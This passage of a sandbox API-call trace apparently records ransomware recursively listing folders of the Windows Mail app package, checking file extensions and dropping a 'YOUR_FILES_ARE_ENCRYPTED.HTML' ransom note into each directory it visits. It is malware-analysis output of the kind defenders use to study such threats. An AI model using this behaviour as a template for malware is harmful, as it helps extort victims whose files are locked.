lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\*" [0120.222] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20185bcc, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x20185bcc, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x20185bcc, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.223] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20185bcc, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x20185bcc, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x20185bcc, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.223] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20185bcc, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x20185bcc, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x20185bcc, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="483", cAlternateFileName="")) returned 1 [0120.223] StrStrIW (lpFirst="483", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.223] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\483") returned 119 [0120.223] GetProcessHeap () returned 0x600000 [0120.223] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0120.223] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\483" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\483") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\483" [0120.223] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\483", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\483\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\483\\*" [0120.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\483\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20185bcc, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x20185bcc, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x20185bcc, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883a0, dwReserved1=0x31882b8, cFileName=".", cAlternateFileName="")) returned 0x626778 [0120.224] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20185bcc, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x20185bcc, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x20185bcc, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883a0, dwReserved1=0x31882b8, cFileName="..", cAlternateFileName="")) returned 1 [0120.224] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20185bcc, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x20185bcc, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x20185bcc, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883a0, dwReserved1=0x31882b8, cFileName="..", cAlternateFileName="")) returned 0 [0120.224] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0120.224] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\483\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 [0120.224] GetProcessHeap () returned 0x600000 [0120.224] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\483\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\files\\483\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.226] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0120.227] CloseHandle (hObject=0x324) returned 1 [0120.227] GetProcessHeap () returned 0x600000 [0120.227] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.227] GetProcessHeap () returned 0x600000 [0120.227] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0120.228] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20185bcc, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x20185bcc, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x20185bcc, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="483", cAlternateFileName="")) returned 0 [0120.228] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.228] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0120.228] GetProcessHeap () returned 0x600000 [0120.228] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Files\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\files\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.230] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.231] CloseHandle (hObject=0x320) returned 1 [0120.231] GetProcessHeap () returned 0x600000 [0120.231] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.231] GetProcessHeap () returned 0x600000 [0120.231] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.232] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a449e2f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a449e2f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2ed5138d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="HxStore.hxd", cAlternateFileName="")) returned 1 [0120.232] StrStrIW (lpFirst="HxStore.hxd", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.232] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\HxStore.hxd") returned 121 [0120.232] PathFindExtensionW (pszPath="HxStore.hxd") returned=".hxd" [0120.232] lstrlenW (lpString=".hxd") returned 4 [0120.232] PathFindExtensionW (pszPath="HxStore.hxd") returned=".hxd" [0120.232] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a470192, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a470192, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a470192, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="Photos", cAlternateFileName="")) returned 1 [0120.232] StrStrIW (lpFirst="Photos", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.232] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos") returned 116 [0120.232] GetProcessHeap () returned 0x600000 [0120.232] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.232] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos" [0120.233] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos\\*" [0120.233] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a470192, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a470192, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a470192, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.233] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a470192, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a470192, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a470192, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.233] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a470192, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a470192, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a470192, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.233] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.234] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0120.234] GetProcessHeap () returned 0x600000 [0120.234] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\Photos\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\photos\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.255] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.256] CloseHandle (hObject=0x320) returned 1 [0120.256] GetProcessHeap () returned 0x600000 [0120.256] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.256] GetProcessHeap () returned 0x600000 [0120.256] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.258] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a470192, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2a470192, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2a470192, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="Photos", cAlternateFileName="")) returned 0 [0120.258] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.258] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 139 [0120.258] GetProcessHeap () returned 0x600000 [0120.258] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.259] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.260] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.261] CloseHandle (hObject=0x31c) returned 1 [0120.261] GetProcessHeap () returned 0x600000 [0120.261] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.261] GetProcessHeap () returned 0x600000 [0120.261] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.261] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdcb84880, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdcb84880, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdcb84880, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0120.261] StrStrIW (lpFirst="microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.261] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe") returned 169 [0120.261] GetProcessHeap () returned 0x600000 [0120.262] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.262] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe" [0120.262] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\*" [0120.262] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdcb84880, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdcb84880, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdcb84880, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.262] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdcb84880, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdcb84880, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdcb84880, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.262] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdcb84880, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdcb84880, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdcb84880, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d156, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0120.262] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.262] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 185 [0120.262] GetProcessHeap () returned 0x600000 [0120.262] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.264] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore" [0120.264] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0120.264] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\microsoft.windowscommunicationsapps_17.6308.42271.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdcb84880, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdcbd0d59, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdcbd0d59, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.264] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdcb84880, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdcbd0d59, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdcbd0d59, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.264] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, 